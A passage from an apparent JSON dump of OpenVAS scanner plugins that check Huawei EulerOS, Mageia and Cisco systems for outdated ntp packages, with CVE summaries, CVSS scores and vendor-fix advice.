script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2066\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2066\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-2066 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.\nMitigation:Do not add the 'limited' configuration option to any restrict lines in the ntp.conf file.(CVE-2015-7705)\n\nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the 'other side' of an interleaved association causing the victim ntpd to reset its association(CVE-2018-7185)\n\nThe ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.(CVE-2015-7976)\n\nntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.\nMitigation:Disable NTP remote configuration or limit this feature to trusted users to effectively mitigate this risk(CVE-2015-7850)\n\nThe datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value.(CVE-2015-7853)\n\nCrypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to bypass authentication.(CVE-2015-7871)\n\nThe decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value.(CVE-2015-7855)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h19\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h19\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~25.0.1.h19\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7853"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191719", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1719)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1719\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2015-7705\", \"CVE-2015-7850\", \"CVE-2015-7853\", \"CVE-2015-7855\", \"CVE-2015-7871\", \"CVE-2015-7976\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:20:46 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1719)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1719\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1719\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-1719 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.\nMitigation:Do not add the 'limited' configuration option to any restrict lines in the ntp.conf file.(CVE-2015-7705)\n\nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the 'other side' of an interleaved association causing the victim ntpd to reset its association(CVE-2018-7185)\n\nThe ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.(CVE-2015-7976)\n\nntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.\nMitigation:Disable NTP remote configuration or limit this feature to trusted users to effectively mitigate this risk(CVE-2015-7850)\n\nThe datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value.(CVE-2015-7853)\n\nCrypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to bypass authentication.(CVE-2015-7871)\n\nThe decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value.(CVE-2015-7855)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.1.h17\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.1.h17\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T16:46:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7853"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-03T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191222", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191222", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1222)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1222\");\n script_version(\"2020-03-03T09:12:51+0000\");\n script_cve_id(\"CVE-2015-7705\", \"CVE-2015-7853\", \"CVE-2015-7871\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 09:12:51 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:35:31 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1222)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1222\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1222\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-1222 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.CVE-2015-7705\n\nThe datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value.CVE-2015-7853\n\nCrypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to bypass authentication.CVE-2015-7871\n\nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the 'other side' of an interleaved association causing the victim ntpd to reset its association.CVE-2018-7185\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h18\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h18\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~25.0.1.h18\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:35:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7705", "CVE-2015-7850"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191323", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1323)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1323\");\n script_version(\"2020-01-23T15:42:05+0000\");\n script_cve_id(\"CVE-2015-7705\", \"CVE-2015-7850\", \"CVE-2015-7976\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 15:42:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:39:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1323)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1323\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1323\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-1323 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.\nMitigation:Do not add the 'limited' configuration option to any restrict lines in the ntp.conf file.(CVE-2015-7705)\n\nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the 'other side' of an interleaved association causing the victim ntpd to reset its association(CVE-2018-7185)\n\nThe ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.(CVE-2015-7976)\n\nntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.\n Mitigation:Disable NTP remote configuration or limit this feature to trusted users to effectively mitigate this risk(CVE-2015-7850)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h8.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h8.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h8.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2015-7850", "CVE-2015-7853"], "description": "Mageia Linux Local Security Checks mgasa-2015-0418", "modified": "2018-09-28T00:00:00", "published": "2015-11-08T00:00:00", "id": "OPENVAS:1361412562310131123", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131123", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0418", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0418.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131123\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-08 13:02:17 +0200 (Sun, 08 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0418\");\n script_tag(name:\"insight\", value:\"Yves Younan discovered that NTP incorrectly handled logfile and keyfile directives. In a non-default configuration, a remote authenticated attacker could possibly use this issue to cause NTP to enter a loop, resulting in a denial of service (CVE-2015-7850). Yves Younan discovered that NTP incorrectly handled reference clock memory. A malicious refclock could possibly use this issue to cause NTP to crash, resulting in a denial of service, or possibly execute arbitrary code (CVE-2015-7853). John D Doug Birdwell discovered that NTP incorrectly handled decoding certain bogus values. An attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service (CVE-2015-7855).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0418.html\");\n script_cve_id(\"CVE-2015-7850\", \"CVE-2015-7853\", \"CVE-2015-7855\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0418\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~24.3.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2015-7976", "CVE-2015-7850"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191230", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1230)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1230\");\n script_version(\"2020-01-23T11:35:53+0000\");\n script_cve_id(\"CVE-2015-7850\", \"CVE-2015-7855\", \"CVE-2015-7976\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:35:53 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:35:53 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-1230)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1230\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1230\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-1230 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.CVE-2015-7976\n\nntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote authenticated users to cause a denial of service (infinite loop or crash) by pointing the key file at the log file.CVE-2015-7850\n\nThe decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value.CVE-2015-7855\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h19\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h19\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~25.0.1.h19\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-06-24T19:51:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "description": "Multiple Cisco products incorporate a version of the ntpd package.\n Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated,\n remote attacker to create a denial of service (DoS) condition or modify the time being advertised by a\n device acting as a network time protocol (NTP) server.\n\n On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS\n vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker\n gaining the ability to modify an NTP server", "modified": "2020-06-23T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310105668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105668", "type": "openvas", "title": "Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Multiple Vulnerabilities in ntpd Affecting Cisco Products - October 2015\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios_xe\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105668\");\n script_cve_id(\"CVE-2015-7848\", \"CVE-2015-7849\", \"CVE-2015-7850\", 